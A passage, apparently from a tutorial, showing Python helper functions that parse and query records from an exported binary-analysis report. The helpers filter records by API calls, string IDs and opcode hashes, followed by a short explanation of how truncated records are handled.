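    if rec is not None:                       # truncated trailing record
        records.append(rec)
    return records


def api_sequence(rec):
    """The function's own (non-subcall) API calls, in call-site address order."""
    return [a["name"] for a in sorted(rec["apis"], key=lambda a: a["ref"])
            if a["subcall_of"] is None]


def records_where(records, key, needle):
    """Records whose value for `key` (e.g. "String ID") contains `needle`."""
    return [r for r in records if needle in r.get(key, "")]


def records_calling(records, api_name):
    return [r for r in records if any(a["name"] == api_name for a in r["apis"])]


def hash_mismatches(records):
    """Records where Opcode ID and Opcode Fuzzy Hash disagree (none in this report)."""
    return [r for r in records if "Opcode ID" in r and "Opcode Fuzzy Hash" in r
            and r["Opcode ID"] != r["Opcode Fuzzy Hash"]]
```

Feed `parse_records` the text of a full export rather than the excerpt. A record cut off at the top of a page (such as the three hash lines that open this section) comes out as a dict with an empty `apis` list and no Opcode ID, and an empty field such as `String ID:` is kept as an empty string so it can still be queried; `api_sequence` orders calls by their `ref` address, which for the first record above gives the SleepConditionVariableCS, LeaveCriticalSection, WaitForSingleObjectEx, EnterCriticalSection order of the listing.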